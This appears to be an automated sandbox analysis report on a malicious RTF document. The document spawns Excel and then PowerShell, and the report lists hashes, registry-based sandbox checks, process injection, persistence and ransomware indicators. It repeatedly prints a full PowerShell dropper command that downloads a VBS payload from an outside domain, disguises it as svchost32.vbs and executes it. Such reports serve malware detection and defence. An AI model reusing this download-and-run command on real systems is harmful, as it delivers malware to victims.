5311426b5d34e8f473c5c3d60b0ee8e54de8a7257e6e377f5819589d2d67d6e1

Analysis

max time kernel
149s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240910-en
resource tags

arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
submitted
27-09-2024 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fa1208b45a7c8fac37370998395c94e3_JaffaCakes118.rtf
Size

1.2MB
MD5

fa1208b45a7c8fac37370998395c94e3
SHA1

04dcb06574f629eefed7baf843972e6b814ec80a
SHA256

5311426b5d34e8f473c5c3d60b0ee8e54de8a7257e6e377f5819589d2d67d6e1
SHA512

6f5d1418fa539e89a80956b30254bf14067c421831498647a41ce9e8dd115218f3f0696e6ef0d2808bcfd5c5528e99e51cd6020b447a13ce4e3db561345a7e62
SSDEEP

24576:CcFVcvchcTchc+cNcuc2VcpctcTczcUcocEF:2

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://onedrivenet.xyz/work/21.vbs

Signatures

Process spawned unexpected child process 16 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3688	2924	powershell.exe	87
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	5076	4500	powershell.exe	95
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4984	3316	powershell.exe	101
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4640	64	powershell.exe	104
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1856	900	powershell.exe	107
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2628	3912	powershell.exe	111
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3680	3068	powershell.exe	116
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2188	3424	powershell.exe	119
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4808	4364	powershell.exe	122
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2924	5028	powershell.exe	125
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1796	3256	powershell.exe	128
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4788	2000	powershell.exe	131
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	3064	3220	powershell.exe	135
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4568	5008	powershell.exe	138
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4064	2716	powershell.exe	141
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	624	756	powershell.exe	144

Command and Scripting Interpreter: PowerShell 1 TTPs 32 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5076	powershell.exe
4640	powershell.exe
2188	powershell.exe
4808	powershell.exe
4788	powershell.exe
3064	powershell.exe
4568	powershell.exe
3688	powershell.exe
4984	powershell.exe
1856	powershell.exe
2628	powershell.exe
2924	powershell.exe
3680	powershell.exe
624	powershell.exe
1796	powershell.exe
4064	powershell.exe
4808	powershell.exe
2924	powershell.exe
3688	powershell.exe
3680	powershell.exe
2188	powershell.exe
3064	powershell.exe
4568	powershell.exe
4064	powershell.exe
5076	powershell.exe
4984	powershell.exe
4640	powershell.exe
2628	powershell.exe
1796	powershell.exe
1856	powershell.exe
4788	powershell.exe
624	powershell.exe

Checks processor information in registry 2 TTPs 51 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 51 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
4332	WINWORD.EXE
4332	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
3688	powershell.exe
3688	powershell.exe
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
4640	powershell.exe
4640	powershell.exe
4640	powershell.exe
1856	powershell.exe
1856	powershell.exe
1856	powershell.exe
2628	powershell.exe
2628	powershell.exe
2628	powershell.exe
3680	powershell.exe
3680	powershell.exe
3680	powershell.exe
2188	powershell.exe
2188	powershell.exe
2188	powershell.exe
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
1796	powershell.exe
1796	powershell.exe
4788	powershell.exe
4788	powershell.exe
3064	powershell.exe
3064	powershell.exe
4568	powershell.exe
4568	powershell.exe
4064	powershell.exe
4064	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	3680	powershell.exe
Token: SeDebugPrivilege	2188	powershell.exe
Token: SeDebugPrivilege	4808	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	1796	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	3064	powershell.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	4064	powershell.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
4332	WINWORD.EXE
4332	WINWORD.EXE
4332	WINWORD.EXE
2924	EXCEL.EXE
2924	EXCEL.EXE
2924	EXCEL.EXE
2924	EXCEL.EXE
2924	EXCEL.EXE
2924	EXCEL.EXE
2924	EXCEL.EXE
4500	EXCEL.EXE
4500	EXCEL.EXE
4500	EXCEL.EXE
4500	EXCEL.EXE
4500	EXCEL.EXE
4500	EXCEL.EXE
4500	EXCEL.EXE
3316	EXCEL.EXE
3316	EXCEL.EXE
3316	EXCEL.EXE
3316	EXCEL.EXE
3316	EXCEL.EXE
3316	EXCEL.EXE
3316	EXCEL.EXE
64	EXCEL.EXE
64	EXCEL.EXE
64	EXCEL.EXE
64	EXCEL.EXE
64	EXCEL.EXE
64	EXCEL.EXE
64	EXCEL.EXE
900	EXCEL.EXE
900	EXCEL.EXE
900	EXCEL.EXE
900	EXCEL.EXE
900	EXCEL.EXE
900	EXCEL.EXE
900	EXCEL.EXE
3912	EXCEL.EXE
3912	EXCEL.EXE
3912	EXCEL.EXE
3912	EXCEL.EXE
3912	EXCEL.EXE
3912	EXCEL.EXE
3912	EXCEL.EXE
3068	EXCEL.EXE
3068	EXCEL.EXE
3068	EXCEL.EXE
3068	EXCEL.EXE
3068	EXCEL.EXE
3068	EXCEL.EXE
3068	EXCEL.EXE
3424	EXCEL.EXE
3424	EXCEL.EXE
3424	EXCEL.EXE
3424	EXCEL.EXE
3424	EXCEL.EXE
3424	EXCEL.EXE
3424	EXCEL.EXE
4364	EXCEL.EXE
4364	EXCEL.EXE
4364	EXCEL.EXE
4364	EXCEL.EXE
4364	EXCEL.EXE

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2924 wrote to memory of 3688	2924	EXCEL.EXE	88
PID 2924 wrote to memory of 3688	2924	EXCEL.EXE	88
PID 4500 wrote to memory of 5076	4500	EXCEL.EXE	96
PID 4500 wrote to memory of 5076	4500	EXCEL.EXE	96
PID 3316 wrote to memory of 4984	3316	EXCEL.EXE	102
PID 3316 wrote to memory of 4984	3316	EXCEL.EXE	102
PID 64 wrote to memory of 4640	64	EXCEL.EXE	105
PID 64 wrote to memory of 4640	64	EXCEL.EXE	105
PID 900 wrote to memory of 1856	900	EXCEL.EXE	108
PID 900 wrote to memory of 1856	900	EXCEL.EXE	108
PID 3912 wrote to memory of 2628	3912	EXCEL.EXE	112
PID 3912 wrote to memory of 2628	3912	EXCEL.EXE	112
PID 3068 wrote to memory of 3680	3068	EXCEL.EXE	117
PID 3068 wrote to memory of 3680	3068	EXCEL.EXE	117
PID 3424 wrote to memory of 2188	3424	EXCEL.EXE	120
PID 3424 wrote to memory of 2188	3424	EXCEL.EXE	120
PID 4364 wrote to memory of 4808	4364	EXCEL.EXE	123
PID 4364 wrote to memory of 4808	4364	EXCEL.EXE	123
PID 5028 wrote to memory of 2924	5028	EXCEL.EXE	126
PID 5028 wrote to memory of 2924	5028	EXCEL.EXE	126
PID 3256 wrote to memory of 1796	3256	EXCEL.EXE	129
PID 3256 wrote to memory of 1796	3256	EXCEL.EXE	129
PID 2000 wrote to memory of 4788	2000	EXCEL.EXE	133
PID 2000 wrote to memory of 4788	2000	EXCEL.EXE	133
PID 3220 wrote to memory of 3064	3220	EXCEL.EXE	136
PID 3220 wrote to memory of 3064	3220	EXCEL.EXE	136
PID 5008 wrote to memory of 4568	5008	EXCEL.EXE	139
PID 5008 wrote to memory of 4568	5008	EXCEL.EXE	139
PID 2716 wrote to memory of 4064	2716	EXCEL.EXE	142
PID 2716 wrote to memory of 4064	2716	EXCEL.EXE	142
PID 756 wrote to memory of 624	756	EXCEL.EXE	145
PID 756 wrote to memory of 624	756	EXCEL.EXE	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fa1208b45a7c8fac37370998395c94e3_JaffaCakes118.rtf" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4332

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3688

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5076

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3316
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4984

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:64
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4640

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1856

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2628

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3680

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3424
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2188

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4364
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4808

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:5028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://onedrivenet.xyz/work/21.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
  2⤵
  - Process spawned unexpected child process
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2924

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
